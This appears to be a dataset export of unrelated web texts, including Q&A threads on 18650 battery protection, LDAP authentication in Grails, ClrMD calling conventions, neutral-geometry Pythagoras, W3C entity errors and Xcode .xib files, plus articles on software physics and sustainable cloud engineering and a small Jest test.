Document
stringlengths
395
24.5k
Source
stringclasses
6 values
Does a 3S 18650 battery pack need a balanced charge circuit? I am looking at building a custom powerbank with 3 or 4 cells in series to generate 11-15V. I am looking at some of the TI Li-Ion charger IC's BQ257x3 and BQ241xx. These are really nice IC's but don't charge or balance the cells individually. Of course, they do implement the proper Li-ion charge cycle with constant current first and then a constant voltage until the current drops. They also have over-voltage protection, temperature monitoring, and input current limitation, and that kind of stuff so do overlap in functionality with the battery pack protection boards that usually monitor individual cells. So assuming there is a protection board on the pack that monitors at least the minimum/maximum voltage per cell and that the individual cells are all new and from the same brand/model and likely even the same production batch, would there still be a need to charge/balance all cells independently for the battery pack? Or can I just treat the 3S pack as a single battery and assume they all charge/discharge at the same rates? The other question I have is if I use one of those charge IC's, which already monitor for over-voltage, (dis)charge current, and temperature on the battery pack, and turn off the output if the total battery pack voltage gets too low, is there still even a need for the protection board on the battery pack (as long as they are new and identical cells)? Or can I just hook up 3 cells in series directly to the charger without the risk of batteries over/undercharging and thus breaking or worse (provided the rest of the circuit matches safe charge currents at around 1/2C and voltage for those cells of course). can I just treat the 3S pack as a single battery and assume they all charge/discharge at the same rates? - no you shouldn't. Based on your questions, I suspect you don't yet have the basic understanding required to design your own power bank. I strongly recommend that you buy a ready-made power bank: safe, guaranteed to work, cheaper. Or, if you must build your own, I recommend you buy a ready-made BMS: safe, guaranteed to work, cheaper. I recommend you buy a ready-made charger: safe, guaranteed to work, cheaper. Does a 3S 18650 battery pack need a balanced charge circuit? Balancing a string of cells in series is optional because it is not a safety feature. However, balancing is highly desirable as it maximizes the effective capacity of a string of cells over time. That is why it is almost universally implemented. Just about every BMS IC does implement balancing. BQ25723 and BQ241xx. Those are not BMS ICs. Those are charger ICs. A charger is not a BMS. You need both: a charger AND and a BMS. The probability if mismatched Capacity in the equivalent circuit will increase with the number of series cells. There will also be a tolerance on Each cell ESR. The charging voltage under CC mode will be ; Vcell= Time Integral { (Ichg * dt) / C [Farads]} + Ichg * ESR ... for each cell Thus when it changes from CC mode to CV mode and cuts off at say 5% Ichg, will the voltage and energy stored on each cell be the same? No but the % of State of charge or overcharge determines how fast the acceleration occurs on each charge cycle in amplifying this difference. ? Possibly for a couple hundred charge cycles as long as they don't get deeply discharged then aging occurs more rapidly on the weakest cell. So it all depends how well match your cells are . Consider how hard it is to make electrolytic caps < 1 % tolerance. This is significant and likewise similar for electrolytic batteries. in short , you don't need to worry if you dont care how many cycles you get, but if the cells don't come from the the same batch process, you can always extend the life of the pack by using a balancer. The time spent above 4V and below 3V, significantly accelerates aging, so it totally depends on your reliability expectations. manufacturers can expect tighter tolerances with process controls, but end-users cannot know which batch parts come from. The other question I have is if I use one of those charge IC's, which already monitor for over-voltage, (dis)charge current, and temperature on the battery pack, and turn off the output if the total battery pack voltage gets too low, NO. THEY. DON'T. Those ICs are chargers, not protectors. Those ICs do not protect your battery. is there still even a need for the protection board on the battery pack (as long as they are new and identical cells) You MUST have a protector BMS in your battery. A protector BMS is absolutely required, and a charger is absolutely required. Both are absolutely required. They are two different devices. Each is absolutely required.
STACK_EXCHANGE
Published on Ingenium n. 102, April-May 2015 Journal of Terni’s Institution of Engineers (Cineca-MIUR scientific magazine n. E203872) Software engineering is a young discipline, with solid scientific basis in several fields of mathematics and in some fields that pertain strictly to computer science (e.g. relational database theory and compiler theory). Still, software engineering is a fertile ground for “snake oil salesmen”: when facing a problem to be solved it’s easy to find scores of experts (gurus, mentors) that promote the fashion-du-jour as the definitive panacea. The comparison with other engineering disciplines is depressing. In civil engineering, for example, the materials and their shape are (or should be) chosen on the basis of a solid corpus of scientific knowledge: the forces that the structures will need to face and the different properties of materials (e.g. elasticity), that describe their behavior in reaction to such forces. Is it better iron or an alloy of iron, carbon and chromium? The correct answer is that that the question is ill-posed, it depends on the problem at hand! But if you ask a sample of (more or less aware) software engineering practitioners and ask them: is it better functional programming or object oriented programming? Is it better Java or C#? Rest assured that you will almost always get sharp and heartfelt answers: for the most part, nowadays, software engineering is nothing more than a rhetoric exercise, while an argument about the material and the shape to be used in a physical construction can be resolved without endless debates just by the accurate usage of physics and material science. If we consider the laws of physics, in fact, it would be pointless to build an house by using glass only (“it’s brighter!”) or bricks only (“it’s stronger!”): the usefulness of the materials depends on the context. And yet, while developing software, this happens often: we build an “house” by using “bricks” only, or by using “glass” only. From several years Carlo Pescio, a well-known Italian software engineering professional, is trying to create a basic theory that he named “physics of software”: the software is considered as a material, while the software design (at every level) is considered as the process of shaping the software/material in the most appropriate way to solve the problem at hand. If we adopt this point of view, and we try to draw an analogy with material sciences, we must ask ourselves: what do we know about the software/material properties and about the “forces” that it must withstand? Not much, so far. In the software engineering knowledge body we mostly find: - Principles and methods: more or less dogmatic practices, stripped out of their original context and risen to the rank of principles; the process of stripping the context away makes such principles ill-defined and/or superfluous. - Patterns and reference designs: catalogs of design techniques to solve specific problems. - Metrics: software properties that can be measured more or less easily, but whose clarity and usefulness in the software design process are rather questionable. They may look similar to the aforementioned material’s properties, but they are not defined as a direct reaction to specific “forces”. - -ilities: reliability, scalability, maintainability etc. At first glance they may look like the aforementioned physical material’s properties, but they are fundamentally different: their definition is too generic (they are not defined as reactions to “forces”), so they cannot be measured in a meaningful way. Saying that a software is “scalable” is more like saying that a car is “safe”, but it’s completely different from describing the resistance of a metal alloy to a compression force. In other words, while the analogy “software”/”material” and “software design”/”material shaping” is very clear, we still don’t have any idea about the software properties and about the “forces” that determine such properties. In his work about the “physics of software”, Carlo Pescio tries to explore this aspects, by defining something that we can call a “basic physics” for the software: a theory of software properties and forces. Don’t let the metaphor mislead you, though, because the software’s nature is rather peculiar: software is executable knowledge, designed to be interpreted both by humans, that write and read programs, and by computers, that must run them to obtain the desired results. So, even if the physics of materials was the inspiration for this research, the model that Carlo Pescio is building looks more like quantum physics. Currently, his “physical” software model is based on two main concepts: - The software exists in three spaces: the decision space (the design’s product), the artifact space (the coding’s product) and the run-time space (the product of the program’s execution by a computer). - The concept of “entanglement“, borrowed directly from quantum physics. The entanglement is a link between components that, with different modes of interaction, characterizes software in each of the three aforementioned spaces. By starting from these two concepts, plus a few other basic ones, it is possible to derive most of principles and patterns that are the current written and spoken tradition of software engineering. Carlo Pescio’s research on the “physics of software” is documented on the website www.physicsofsoftware.com. From some time the author has taken a pause from publishing his ideas, also because of their poor reception (it cannot be otherwise, in a world filled by the background noise of gurus and mentors, remember?). Still, his research is essential for the evolution of software engineering: the results that he published on his website are a great starting point to meditate deeply about the nature of software engineering. Let’s hope that we can read the next chapters soon!
OPCFW_CODE
Support for PiZero/PiZeroW The RaspberryMatic and ELV state that the module/software is compatible with Pi 2 & 3. However, the Zero and the Zero Wireless both have the same GPIO pinout, so I don't see why they should not work? Is the missing support maybe an oversight or is there an obivous reason why I shouldn't try it? This is of course a very valid question (which in fact I have already thought about myself). The answer is, however, also quite straight forward: Technically there shouldn't be any reasons why the Pi Zero or the newer Pi Zero W won't work with RaspberryMatic – but there is still some work to do! The currently shipped image won't work with the Pi Zero hardware out-of-the-box because the main hardware on the Pi Zero is based on the older RaspberryPi1 model which has a different/older SoC chip than the Pi2 or Pi3 models. It shouldn't be any big deal to actually tune the build environment of RaspberryMatic to also build an own image for the Pi Zero / Pi Zero W which should then also enable RaspberryMatic to work on the much older RaspberryPi1 models. I simply lacked the time (though I have a Pi Zero at home) to actually work on this. The sold numbers of Pi Zero boards are still quite small (only one board per customer limitation) The older hardware (compared to a Pi3) and the point that a CCU should normally run as a server 24h/7days also raises some questions if there are really big numbers to be expected for a CCU running on a PiZero. Up to the recent release of the PiZeroW with embedded WiFi/Bluetooth it even was more questionable to use a PiZero at all for RaspberryMatic because until recently the WiFI support was non existent in RaspberryMatic. Now that we have working WiFi-support in RaspberryMatic (coming with the next beta5 version) the PiZero might be more usable. But also keep in mind that using WiFi for something critical like a CCU is also questionable in itself due to stability/security concerns. To summarize: I fully understand the wish to use a PiZero for RaspberryMatic and I haven't yet abandoned the idea completly. But it simply had and still has low priority to be implemented. But if you have something to contribute, feel free to send over some Pull Requests which I would happily integrate in the main repository of RaspberryMatic :) Please also note that the same question can be raised for other embedded platforms like BananaPi, etc. – which I would in principle also be happy to support in a future version of RaspberryMatic. Thanks for the response. You can order more than one ZeroW by now and it's way more useful thant the old Zero, so I guess the sales will go up. Funny, until you mentioned the WLAN I didn't even think about the fact that it does not have a LAN port 😄 But I guess that's not an issue [in my case] with a stable WLAN. I'm a newbie in the Homematic world for now, but since I'll get some ZeroWs soon I sure can try to build it on one of them. The HM-MOD-RPI-PCB works on the GPIO of Model B (without +) with YAHM. What's the state of the RaspberryPi Model B in Raspberrymatic? @renne Not working yet. I guess it will be supported once I have support for the Pi Zero line ready. However, support for other RaspberryPi models than Pi2/3 has currently low priority. Any way we can support with the developement for the PI Zero? I would love to see a working image for my PI ZeroW to be able to use Homematic in my caravan. :-) @jens-maus RaspberryPi Zero W + HM-MOD-RPI-PCB would be a cheap replacement for the LAN Gateway (HM-LGW-O-TW-W-EU). ;) Would it be possible to generate an additional image for the RasperryPi Zero W that only includes the hmlangw daemon? So one could easily build a wireless LAN GW that does not need any configuration. Of course this is possible and it is also a plan. However, I need time for that which I currently don't have. But feel free to help out by implementing Pi Zero W support :) Is there anything special concerning Pi Zero support in the "pizero" branch yet? No, there is nothing "special" about it, it is just a development branch which I haven't finished yet because other things were more important. Thus, the "pizero" branch doesn't produce a running RaspberryMatic for PiZero systems (yet).
GITHUB_ARCHIVE
const sumPetYears = require("./js-III"); const pets = [ { name: "Tinkerbell", species: "cat", age: 2 }, { name: "Lucy", species: "dog", age: 12 }, { name: "Chloe", species: "cat", age: 18 }, { name: "Mojo", species: "dog", age: 6 }, { name: "Olivia", species: "parakeet", age: 4 }, { name: "Shadow", species: "cat", age: 8 }, { name: "Oreo", species: "cat", age: 5 }, { name: "Molly", species: "dog", age: 4 }, { name: "Freddie Prinze Jr.", species: "parakeet", age: 9 } ]; test("Takes in a database of pets, the type of pet searched for, and number of years to multiply, and returns total number", () => { expect(sumPetYears(pets, "parakeet", 5)).toBe( "The combined parakeets' ages: 65" ); expect(sumPetYears(pets, "dog", 7)).toBe("The combined dogs' ages: 154"); expect(sumPetYears(pets, "cat", 4)).toBe("The combined cats' ages: 132"); });
STACK_EDU
[v1] Use WINAPI calling convention for native APIs See https://github.com/dotnet/diagnostics/issues/846#issuecomment-606996179 Should it documented somewhere why things are as they are? Maybe in form of a unit test reflecting at delegate metadata to catch accidental changes? Just looking at unannotated delegates might be tempting to "fix" for someone starting to work on the project in the future. I just want to make sure I understand this change before merging it. This change is asserting: The calling convention of COM calls on Windows is stdcall. The calling convention for "COM" code on Linux is cdecl (e.g. ISOSDac6::DacGetMethodTableCollectibleData's implementation is cdecl on Linux). The calling convention should be changed to WinAPI which sets the appropriate behavior (1 & 2) on the corresponding systems. Simply omitting the [UnmanagedFunctionPointer] attribute altogether is equivalent to [UnmanagedFunctionPointer(CallingConvention.WinApi)]. Is that correct? A couple questions: What problem is being solved changing from StdCall to WinApi? IE how does ClrMD function at all on linux without causing stack corruption if we've been providing the wrong calling convention? Does the correct behavior still happen on Desktop CLR? I assume the default is stdcall on desktop clr? The calling convention of COM calls on Windows is stdcall. STDMETHODCALLTYPE is defined as __stdcall in winnt.h. The calling convention for "COM" code on Linux is cdecl (e.g. ISOSDac6::DacGetMethodTableCollectibleData's implementation is cdecl on Linux). STDMETHODCALLTYPE is defined as __cdecl (since .NET Core 2.1). https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/debug/daccess/dacimpl.h#L1190 https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/pal/inc/rt/palrt.h#L197 The calling convention should be changed to WinAPI which sets the appropriate behavior (1 & 2) on the corresponding systems. WinAPI is converted to the default calling convention. https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/vm/dllimport.cpp#L3292 Simply omitting the [UnmanagedFunctionPointer] attribute altogether is equivalent to [UnmanagedFunctionPointer(CallingConvention.WinApi)]. The default calling convention is __stdcall on Windows and __cdecl on Linux (since .NET Core 2.1). https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/vm/dllimport.cpp#L3273 What problem is being solved changing from StdCall to WinApi? IE how does ClrMD function at all on linux without causing stack corruption if we've been providing the wrong calling convention? If we've been providing the wrong calling convention on Linux x86, ClrMD causes stack corruption in every reverse interop and the program crashes with segmentation fault. Does the correct behavior still happen on Desktop CLR? I assume the default is stdcall on desktop clr? I assume yes. Ahh thanks for the clarifications! If we've been providing the wrong calling convention on Linux x86, ClrMD causes stack corruption in every reverse interop and the program crashes with segmentation fault. The fact that it was Linux x86 was also the part I missed. This isn't a scenario I tested before. I will make this same change in 2.0. I'm working on changes closely related to this and will fold that into it.
GITHUB_ARCHIVE
How to state Pythagorean theorem in a neutral synthetic geometry? In some lists of statements equivalent to the parallel postulate (such as Which statements are equivalent to the parallel postulate?), one can find the Pythagorean theorem. To prove this equivalence one has first to state the pythagorean theorem in neutral geometry (I name 'neutral geometry' a geometry in which parallel lines do exist but with the parallel postulate removed). If one start with an axiom system like Birkhoff's postulates which assume reals numbers and ruler and protractor from the beginning then there is no problem stating the Pythagorean theorem. My question is how one can one state the Pythagorean theorem in a neutral synthetic geometry based on axioms such as Hilbert's axioms group I II III or Tarski's axioms $A_1-A_9$ ? It is possible to define segment length in neutral Tarski's or Hilbert's geometries as an equivalence class using the congruence ($\equiv$) relation. It is also possible to define the congruence of triangles. However, the geometric definition of multiplication as given by Hilbert assume the parallel postulate. The existence of a square is equivalent to the parallel postulate. What is "neutral synethic geometry"? In particular, does it contain a notion of segment length and angle measurement? And if so, why can't you just then simply state the Pythagorean theorem in the ordinary way? @LeeMosher I edited the question. Neutral geometry is the geometry without the parallel postulate. One can define the segment length as the equivalent class using the congruence of segments. But to state that $a^2 + b^2 = c^2$ you can not use the multiplication because the usual definition of multiplication use the parallel postulate. How about area measurement, does that exist in your system? If so, then perhaps, without the parallel postulate, one can define and construct the geometric square on a given side, i.e. a regular quadrilateral. And then use the areas of squares to state the Pythagorean theorem. It will be false, of course, if the parallel postulate fails, but you can state it. Victor Pambuccian pointed me to the following note which give a partial answer to the question: http://link.springer.com/article/10.1007/s00283-010-9169-0 This link shows that Pythagorean Theorem implies the parallel postulate: https://www.cut-the-knot.org/triangle/pythpar/PTimpliesPP.shtml The link does not explain how to state the Pythagorean theorem in neutral geometry. Within synthetic approach for geometry (such as Hilbert's axioms) one can define the notion of segment measure: Definition. Denote the set of segments by $\mathcal{S}$. We say that a function $\mu:\mathcal{S}\rightarrow \mathbb{R}$ is a segment measure whenever: $\mu(ab)>0$. $ab\equiv a_1b_1$ $\implies$ $\mu(ab)=\mu(a_1b_1)$. $B(abc)$ $\implies$ $\mu(ab)+\mu(bc)=\mu(ac)$. $B(abc)$ stands for "point $b$ lies between $a$ and $c$", which is a primitive notion. The definition involves real numbers but they are regarded independently from the theory of geometry. The following two theorems serve to answer the question about the Pythagorean theorem: Theorem 1. If $\mu,\mu_1$ are segment measures, then there exists $\lambda>0$ such that $\mu=\lambda\mu_1$ Theorem 2. There exists a segment measure $\mu$ (In fact it can be chosen in such way that $\mu(ab)=x$ for arbitrary segment $ab$ and $x>0$). Asssume we are given a triangle $\triangle abc$. Combining these two theorems we see that we can state $$\mu(ab)^2=\mu(bc)^2+\mu(ac)^2$$ and prove that its logical value does not depend on the choice of the measure since assuming above sentence is true for some measure $\mu$, then for arbitrary measure $\mu_1$ we have $\mu=\lambda\mu_1$ for some $\lambda>0$ and $$\lambda^2\mu_1(ab)^2=\lambda^2\mu_1(bc)^2+\lambda^2\mu_1(ac)^2$$ $$\mu_1(ab)^2=\mu_1(bc)^2+\mu_1(ac)^2$$ For the proof of theorems 1 and 2 see "Foundations of geometry" by Borsuk and Szmielew.
STACK_EXCHANGE
Achieving 2030 Sustainable Development Goals using Cloud Sustainable Software Engineering is an emerging concept that continues to evolve as the developer community becomes more engaged. In this post, I will discuss the various levers that Microsoft and the development community have on hand to maximize the promise of sustainable development and growth. I will also explore various tools that the Microsoft developer community can use to develop more sustainable software and accelerate progress towards 2030 Sustainable Development Goals. Given this post’s focus on Sustainable Software Engineering, I want to define what exactly ‘sustainability’ means. The UN World Commission on Environment and Development offers that, “Sustainable development is development that meets the needs of the present without compromising the ability of future generations to meet their own needs.” While this is probably one of the more frequently quoted definitions of sustainability, I find a visual representation of sustainable development principles more actionable. The concept of a ‘doughnut’ was first published by Kate Raworth in the 2012 Oxfam Report, and since has gained wide acceptance in the sustainable development community. The doughnut is derived from two boundaries – a social foundation and an ecological ceiling. In her 2017 book, “Doughnut Economics: seven ways to think like a 21st century economist,” Raworth argues that the social foundation is complimentary of the ecological planetary boundary. Basic human needs such as food, clean water, education, equality, and social justice can be met without access to a regenerative and healthy ecological environment. Social foundation and ecological ceiling principles are also reflected in the 17 Sustainable Development Goals published by the United Nations in 2015. While the 17 goals published by the UN may seem to cover a very broad set of issues, after examining them closer, it becomes apparent that they are interconnected via positive and negative feedback loops. Måns Nilsson, Dave Griggs, and Martin Visbeck published a detailed explanation of how these goals either reinforce or cancel each other out. The authors provide an example of these positive and negative interactions (shown in the table below): Real World Example Inextricably linked to the achievement of another goal. Ending all forms of discrimination against women is indivisible from ensuring a women’s full and effective participation and equal opportunities for leadership. Aids the achievement of another goal. Providing access to electricity reinforces water-pumping and irrigation systems. Strengthening the capacity to adapt to climate-related hazards reduces losses caused by disasters. Creates conditions that further another goal. Providing electricity access in rural homes increases education opportunities because it makes it possible for students to complete homework at night with electric lighting. No significant positive or negative interactions. Ensuring education for all does not interact significantly with infrastructure development or conservation of ocean ecosystems. Limits options on another goal. Improved water efficiency can constrain agricultural irrigation. Reducing climate change can constrain options for energy access. Clashes with another goal. Boosting consumption for growth can counteract waste reduction and climate mitigation. Makes it impossible to reach another goal. Ensuring public transparency and democratic accountability cannot be combined with national-security goals. Full protection of natural reserves excludes public access for recreation. The UN also provides a practical example to demonstrate goals and their interactions that you can find here. So, what does it mean for the cloud? As a program manager working on the Microsoft Azure team, I see several opportunities to apply sustainable development principles across various dimensions that will ultimately create a self-reinforcing loop between Microsoft and the developer community. As Microsoft pursues its mission to** “empower every person and every organization on the planet to achieve more**,” the developer community can use the tools and services to help the world reach its 2030 Sustainable Development Goals as Microsoft pursues its own 2030 pledge to become carbon negative. Building Blocks for Sustainable Development on Azure Cloud Infrastructure is the base infrastructure required to run cloud applications. The infrastructure consists of hundreds of data centers across the world, thousands of miles of fiber optic cables, as well as millions of servers running in these data centers. While the software itself has a low environmental impact, the infrastructure required to run the software could have a drastic negative impact. From raw material extraction, the manufacturing of components, assembly, and deployment, Microsoft cloud infrastructure represents a significant portion of Microsoft’s carbon footprint. Microsoft’s pledge to be carbon negative by 2030 includes a strong commitment to transforming its supply chain to a circular cloud supply chain with the goal of minimizing embodied carbon in the hardware it operates, optimizing the efficiency of its physical infrastructure, and minimizing end of life e-waste. Azure Fabric is the operating system of the cloud. Azure Fabric manages physical resources such as computers, storage, and networks, and is responsible for ‘always-on availability’, self-healing, optimization of available resources, and scale. While invisible to the end customers and developers, the Azure team continuously works on optimizing the efficiency of the physical infrastructure while delivering on the promise of being the best platform to develop cloud applications and services. The Azure developer community can leverage Azure services to build end-user applications – whether these are mission-critical enterprise workloads, distributed Internet of Things (IoT) applications, mobile services, Artificial Intelligence (AI), or media applications – all can be done on Azure. This is also where the core of Sustainable Software Engineering practices come into play. Software engineers building applications on Azure can apply Sustainable Software Engineering principles to minimize the carbon footprint of their applications. For example, large batch jobs can be scheduled to run when carbon intensity of the power grid is at its lowest peak. You can check carbon intensity cycles in your region (or country) on the Electricity Map website. Watttime project also offers API access to carbon intensity data that can be used to programmatically schedule and time-shift power-intensive computer workloads in time and geography. In addition to maximizing the use of renewable energy sources, developers can achieve significant carbon savings thereby optimizing networking resources, as covered in my previous post. However, the impact that the developer community can have on sustainable development should not stop there. Developers can leverage Azure to build smart applications that can help reinforce all 17 Sustainable Development Goals. Sustainable Software Engineering Building applications that can directly and indirectly (such as through feedback loops) help the world achieve the UN Sustainable Development Goals is how I choose to think about Sustainable Software Engineering. Microsoft will continue to invest its resources to further optimize its cloud infrastructure, power consumption, server, and network efficiency as well as building smart and efficient developer tools and services. As the developer community, we can use these tools and infrastructure to build tools and applications that serve longer-term objectives such as improving biodiversity, reducing carbon, promoting equality, access to education, health, and freshwater. As an example, the AI for Earth initiative relies on high-performance computer infrastructure to process massive amounts of satellite data, perform image recognition, and process sophisticated climate simulation and optimization tasks, all with the goal of unlocking insights and actionable interventions that will improve biodiversity, access to clean water, sustainable agriculture, and health. So, when we measure whether software is sustainable, it’s important to take into account the environmental impacts of the infrastructure, power consumption, and efficiency of the code, as well as the outcomes that the software enables. We can use the 17 Sustainable Development Goals as a guide and a litmus test of the impacts our applications have on the world around us.
OPCFW_CODE
> Cannot Generate > Cannot Generate System Identifier For General Entity View Cannot Generate System Identifier For General Entity View Shaman Topic Author Offline New Member Less More Posts: 5 Thank you received: 0 3 years 4 months ago - 3 years 4 months ago #7 by Shaman xillibit wrote: Hello, Mittineague 2008-02-22 00:58:24 UTC #3 "Article [space] 1" is not a valid value. May cause dizziness or vertigo. However what you said actually seems pretty straightforward. click site Here is the output of my errors: 1. An easy calculus inequality that I can't prove How to deal with a coworker that writes software to give him job security instead of solving problems? Anyway - Does anyone know how to fix this issue so that it does not throw up an error??? Create an account Forum Archive Kunena 2.0 K 2.0 General Questions Invalid XHTML in /components/com_kunena/views/topic/view.html.php × Kunena 5.0.3 Released (23 Oct 2016) The Kunena team is pleased to announce Kunena 5.0.3 As you can see from the bold area a & sign is being pulled in from somewhere and no ; after it. # Warning Line 183, Column 305: cannot generate system THANKS!!! Be careful to end entity references with a semicolon or your entity reference may get interpreted in connection with the following text. Line 17, Column 689: entity was defined here …eft" href="index.php?option=com_kunena&view=topic&layout=reply&catid=8&id=24" … Line 17, Column 701: cannot generate system identifier for general entity "layout" …ndex.php?option=com_kunena&view=topic&layout=reply&catid=8&id=24" rel="nofollo… ? An entity reference Attachments: Last Edit: 3 years 4 months ago by Shaman. Forgot your username? If this error appears in some markup generated by PHP's session handling code, this article has explanations and solutions to your problem. Solutions? So instead of this: You need to use this (scroll to the right to see that the & have been replaced with&): Replacing that line Usually these will all disappear when the original problem is fixed. ✉ 2. Join them; it only takes a minute: Sign up How do I pass W3 validation for Google checkout url? Info Line 71 column 42: entity was defined here. ...td class="l b">http://frontpagedevices.com/cannot-generate/cannot-generate-system-identifier-for-general-entity.php Line 17, Column 701: general entity "layout" not defined and no default entity …ndex.php?option=com_kunena&view=topic&layout=reply&catid=8&id=24" rel="nofollo… ? This is usually a cascading error caused by a an undefined entity reference Count trailing truths Advisor professor asks for my dissertation research source-code Why put a warning sticker over the warning on this product? Thanks for your question. Warning Line 72 column 45: reference to external entity in attribute value. ...class="l b">Please Log in or Create an account to join the conversation. See the previous message for further details. You may have to register before you can post: click the register link above to proceed. You are using github.com/kunena ? Topic Info In: Themes and Templates 8 replies 3 participants Last reply from: James Huff Last activity: 6 years, 4 months ago 3.03 Status: not resolved Forum Search Search for: About Now you know how some people are irritates invalid HTML/XHTML code Yes, invalid HTML/XHTML code works, but it although only slightly, but the affects the performance. To start viewing messages, select the forum that you want to visit from the selection below. » Search Forums » Advanced Search Server Management Server Backups Server Hardening » Online Users: An entity in this context is an encoded character or symbol that you might want to present in a web page. my review here Usually these will all disappear when the original problem is fixed. That'll be £10, please That'll be £10, please Full-site HTML validation Free, quick and easy. A URL query string (either to be displayed in the page or in an element attribute) Use ppp instead of ppp Directly in a web page Use Foo & Consult your tech support before using Linux. (note--after using Linux, you may notice extreme discomfort when using Microsoft. We understand that various XHTML code validators will "object" to the possibility or probability that Kunena is not 100% "compliant" with the XHTML 1.0 recommendations but this does not mean that W3 site validation. 1 error left, can someone look at this code? Is there any known limit for how many dice RPG players are comfortable adding up? Examples include & to display an ampersand (&), which has a special meaning in HTML, and © to display a copyright symbol (©), not commonly found on keyboards. Attachments: Please Log in or Create an account to join the conversation. The most common cause of this error is unencoded ampersands in URLs as described by the WDG in "Ampersands in URLs". Important Invalid XHTML in /components/com_kunena/views/topic/view.html.php Start Prev 1 Next End 1 Shaman Topic Author Offline New Member Less More Posts: 5 Thank you received: 0 3 years 4 months ago - The & character entity is predefined in both HTML and XML, so it should always be safe to use.
OPCFW_CODE
LDAP Authentication Error Im getting an error in grails when trying to use LDAP authentication to find a user using AD authentication. This is the code I have from the grails side: @Override public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException, DataAccessException { ArrayList<String> roles=new ArrayList<String>(2); roles.add("ROLE_USER"); try { GldapoSchemaClassForUser.findAll( directory: "user", filter: "(userPrincipalName=${username})" ).each{ user -> def userName = user.cn user.memberOf.each{ groupListing -> String groupName=groupListing.substring(3, groupListing.indexOf(',')); if (groupName.equals("Admin")) { roles.add("ROLE_ADMIN"); } else if (groupName.equals("User")) { // Do nothing } } catch (Throwable e) { System.err.println(e.getMessage()) } return new User(username) } It hits the catch block when it tries to access this line above: GldapoSchemaClassForUser.findAll( directory: "user", filter: "(userPrincipalName=${username})" ) showing this error message: org.springframework.ldap.AuthenticationException: [LDAP: error code 49 - 80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext error, data 525, vece According to documentation this error suggests that a 525 error means an invalid user but I have tested using an LDAP explorer tool and it connects to the user fine with the same details. In the app-config file I have the following ldap settings: ldap.directories.user.url=ldap://sbs.testsbs.local ldap.directories.user.base=OU=staff,DC=skills,DC=local ldap.directories.user.userDn=OU=staff,DC=skills,DC=local ldap.directories.user.password=Pa55w0rd Does anyone have any ideas as to what I am doing wrong? Your error is in the app-config LDAP settings. The ldap.directories.user.userDn setting has been populated with a container, the same as you specified in ldap.directories.user.base. However this should be the DN of the user object that is performing the search, something along the lines of ldap.directories.user.userDn=CN=myAppUser,OU=staff,DC=skills,DC=local The 525 error means user not found but in this case pertains to the user logging in, and not the user you are searching for.
STACK_EXCHANGE
Lost .h file association in XCode due to empty IBClassDescriber element in .xib NOTE: Perhaps this question could be answered by a pure Objective-C expert as well? I work primarily in MonoTouch, but I think this problem may not be MonoTouch-specific. Typically when the Assistant Editor in XCode won't show my .h file, I just close everything, delete my obj directory, and rebuild all. I wait for the Indexing process to complete. But this time I really can't get the .h file to show up, and thus I'm unable to add any new outlets to my FooViewController. So far, I've tracked it down to an empty IBClassDescriber element in my FooViewController.xib <object class="IBClassDescriber" key="IBDocument.Classes"/> which should look something more like: <object class="IBClassDescriber" key="IBDocument.Classes"> <array class="NSMutableArray" key="referencedPartialClassDescriptions"> <object class="IBPartialClassDescription"> <string key="className">FooViewController</string> <string key="superclassName">UIViewController</string> <dictionary class="NSMutableDictionary" key="outlets"> ... </dictionary> <dictionary class="NSMutableDictionary" key="toOneOutletInfosByName"> ... </dictionary> <object class="IBClassDescriptionSource" key="sourceIdentifier"> <string key="majorKey">IBProjectSource</string> <string key="minorKey">./Classes/FooViewController.h</string> </object> </object> </array> </object> which has the link to the .h file in the minorKey of IBClassDescriptionSource. I've tried cleaning my project, closing all my apps and deleting the obj and bin directories. I've tried renaming the file (along with the above). And other various sporadic cursing and deleting/reverting/and banging things loudly. To no avail. Anyone know how to recover the IBClassDescriber element once it's been emptied? I'm going to have a look back through the file history and see when it disappeared. Maybe that'll give me a clue. Thanks! CM Halfway there... I'm able to recreate the scenario where IBClassDescriptionSource gets set to empty. Details to come when I figure this out. But, quickly, if you create FooViewController, then change the Register("FooViewController") in the .designer file (perhaps from renaming), when you save the file in XCode, the IBClassDescriber entry will be empty. So this scenario came about (like other people have done) when I had renamed my ViewController file and failed to update all references to the old name. There are several places the name of the view controller needs to change, but there are really only 2 critical places that need to match to get XCode and MonoDevelop in synch. For this example, assume I had a view controller named FooViewController and had renamed it to BarViewController. First, every time you launch XCode (XC), MonoDevelop (MD) creates a temporary directory named obj/XCode/# where # starts at 0 and increments by one every time you re-launch XC. The number resets to 0 every time you restart MD. Every time you close XC and return to MD, the directory will be deleted. NOTE: the directory will NOT be deleted if you are browsing the directory from Finder or Terminal, etc. MD creates the required .h and .m files in that directory that XC expects to see. The names of these files are based on the value if the Register attribute in YourViewController.designer.cs. In my case, I had properly updated the .designer file to: [Register ("BarViewController")] Now when I open the .xib I get the dreaded No Assistant Results error. At this point, my .xib file, when opened in the Source Code Editor of MD, showed a full IBClassDescriber section (though improperly referencing ./Classes/FooViewController.h since I hadn't updated it yet). What I did next was to save the .xib from XC. Since XC could not find ./Classes/FooViewController.h (MD was now generating BarViewController.h), it deleted the IBClassDescriber section from the .xib, giving me an empty entity <object class="IBClassDescriber" key="IBDocument.Classes"/> I had failed to update the .xib properly, now I had lost this entire section (which had numerous references that I didn't want or know how to recreate). The key to fixing this was noticing that the -1.CustomClassname property in the .xib was set incorrectly. Updating it to match the Register setting <dictionary class="NSMutableDictionary" key="flattenedProperties"> <string key="-1.CustomClassName">BarViewController</string> ... </dictionary> and re-saving the file resulted in XC recreating the entire IBClassDescriber section with proper references to the .h file <object class="IBClassDescriber" key="IBDocument.Classes"> <array class="NSMutableArray" key="referencedPartialClassDescriptions"> <object class="IBPartialClassDescription"> <string key="className">BarViewController</string> <string key="superclassName">UIViewController</string> <object class="NSMutableDictionary" key="outlets"> ... </object> <object class="NSMutableDictionary" key="toOneOutletInfosByName"> ... </object> <object class="IBClassDescriptionSource" key="sourceIdentifier"> <string key="majorKey">IBProjectSource</string> <string key="minorKey">./Classes/BarViewController.h</string> </object> </object> </array> </object> So in summary, when you're renaming files, the places to change are: Refactor/Rename your main ViewController class 